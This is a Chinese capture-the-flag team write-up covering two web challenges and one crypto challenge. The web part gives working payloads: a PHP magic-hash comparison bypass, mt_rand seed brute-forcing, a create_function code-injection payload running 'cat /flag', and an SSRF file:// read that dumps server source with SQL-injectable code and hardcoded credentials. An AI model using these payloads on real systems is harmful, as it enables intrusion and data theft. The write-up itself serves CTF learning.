yjs writeup 交界地四大高手
[toc]
web
very_easyphp
套娃题,第一层
$han = basename($data['query']);
$a = $_GET['a'];
$b = $_GET['b'];
if (!preg_match('/[a-z0-9_]/i', $han)) {
if (is_string($a) && is_numeric($b)) {
if ($a != $b && md5($a) == md5($b)) {
$week1 = true;
} else {
echo "你行不行,细狗;<br />";
}
} else {
echo "不要耍小聪明哦<br />";
}
} else {
echo "这些都被过滤了哦<br />";
}query直接最后加一个&z=/-就能过
a和b这里使用0e hash即可绕过==比较
a=QNKCDZO&b=240610708然后随机数部分可以直接爆破7位数直接进行预测
for ($i = 0; $i <= 9999999; $i++) {
mt_srand($i);
if(mt_rand() == $hint){
echo($i);
}
}预测第102个随机数为sui
$seed = 1728445;
mt_srand($seed);
echo(mt_rand());
echo("\n");
for ($i = 0; $i <= 100; $i++) {
if ($i == 100) {
$sui = mt_rand();
} else {
mt_rand();
}
}
echo($sui);参数d直接给10001就能过
最后命令执行直接用create_function绕过
flag=\create_function&e=}system('cat /flag');//
sssrf
任意文件读
url=file:///var/www/html/flag.php<?php
/**
* Database mysql
*/
error_reporting(0);
$flag=getenv("FLAG");
$db_host = "127.0.0.1";
$db_user = "root";
$db_pass = "root";
$db_name = "ctf";
$conn = mysqli_connect($db_host, $db_user, $db_pass, $db_name);
if (!$conn) {
die("connect error: " . mysqli_connect_error());
}
if($_SERVER['REMOTE_ADDR']=='127.0.0.1'){
if (isset($_POST["id"])) {
$id = $_POST['id'];
$sql = "select * from users where id='$id'";
$result = mysqli_query($conn, $sql);
if($result) {
$res = mysqli_fetch_array($result);
if ($res){
$err = FALSE;
} else {
$err = TRUE;
}
$err_msg = "";
} else {
$err = TRUE;
$err_msg = mysqli_error($conn);
}
}
mysqli_close($conn);
if(isset($_POST["id"])){
echo $sql;
if($err) {
echo "error";
} else {
echo "success";
}
}
else{
die('请输入搜索的id值');
}
}
else{
die('非本地用户,禁止访问');
}
?>#!/bin/bash
rm -rf /var/run/mysqld/mysqld.sock.lock
rm -rf /tmp/mysql.sock
usermod -d /var/lib/mysql/ mysql
ln -s /var/lib/mysql/mysql.sock /tmp/mysql.sock
chown -R mysql:mysql /var/lib/mysql
mysqld_safe &
mysql_ready() {
mysqladmin ping --socket=/run/mysqld/mysqld.sock --user=root --password=root > /dev/null 2>&1
}
while !(mysql_ready)
do
echo "waiting for mysql ..."
sleep 3
done
mysql -e "ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'root';flush privileges;" -uroot -proot
if [[ -f /db.sql ]]; then
mysql -e "source /db.sql" -uroot -proot
rm -f /db.sql
fi
if [[ -f /flag.sh ]]; then
source /flag.sh
fi
apache2-foreground发现可以直接读start.sh,从而发现flag.sh和dflag文件
读dflag获取flag
crypto
CryptoLight
CF上的原题,可以直接搜到代码
#include<bits/stdc++.h>
using namespace std;
#define MAXN 200005
#define lowbit(x) (x&-x)
#define reg register
#define mkpr make_pair
#define fir first
#define sec second
typedef long long LL;
typedef unsigned long long uLL;
const LL INF=0x3f3f3f3f3f3f3f3f;
const int mo=1e9+7;
const int zero=500;
const LL jzm=2333;
const int orG=3,invG=332748118;
const double Pi=acos(-1.0);
typedef pair<int,int> pii;
const double PI=acos(-1.0);
template<typename _T>
_T Fabs(_T x){return x<0?-x:x;}
template<typename _T>
void read(_T &x){
_T f=1;x=0;char s=getchar();
while(s>'9'||s<'0'){if(s=='-')f=-1;s=getchar();}
while('0'<=s&&s<='9'){x=(x<<3)+(x<<1)+(s^48);s=getchar();}
x*=f;
}
template<typename _T>
void print(_T x){if(x<0){x=(~x)+1;putchar('-');}if(x>9)print(x/10);putchar(x%10+'0');}
int add(int x,int y){return x+y<mo?x+y:x+y-mo;}
int t,n,k,pow2[MAXN],fac[MAXN],f[MAXN],inv[MAXN],ans;
int qkpow(int a,int s){int t=1;while(s){if(s&1)t=1ll*a*t%mo;a=1ll*a*a%mo;s>>=1;}return t;}
void init(){
pow2[0]=1;for(int i=1;i<=1e5;i++)pow2[i]=2ll*pow2[i-1]%mo;
fac[0]=fac[1]=f[1]=inv[0]=inv[1]=1;
for(int i=2;i<=1e5;i++)
fac[i]=1ll*i*fac[i-1]%mo,
f[i]=1ll*(mo-mo/i)*f[mo%i]%mo,
inv[i]=1ll*inv[i-1]*f[i]%mo;
}
int C(int x,int y){
if(x<y||x<0||y<0)return 0;
return 1ll*fac[x]*inv[y]%mo*inv[x-y]%mo;
}
signed main(){
read(t);init();
while(t--){
read(n);read(k);ans=0;
for(int i=1;i<=n&&(i-1)*(k-1)<=n;i++)
ans=add(ans,1ll*C(n-(i-1)*(k-1),i)*fac[i]%mo*inv[n]%mo*fac[n-i]%mo);
printf("%d\n",add(ans,1));
}
return 0;
}
把题目数据输入进去拼起来获取flag
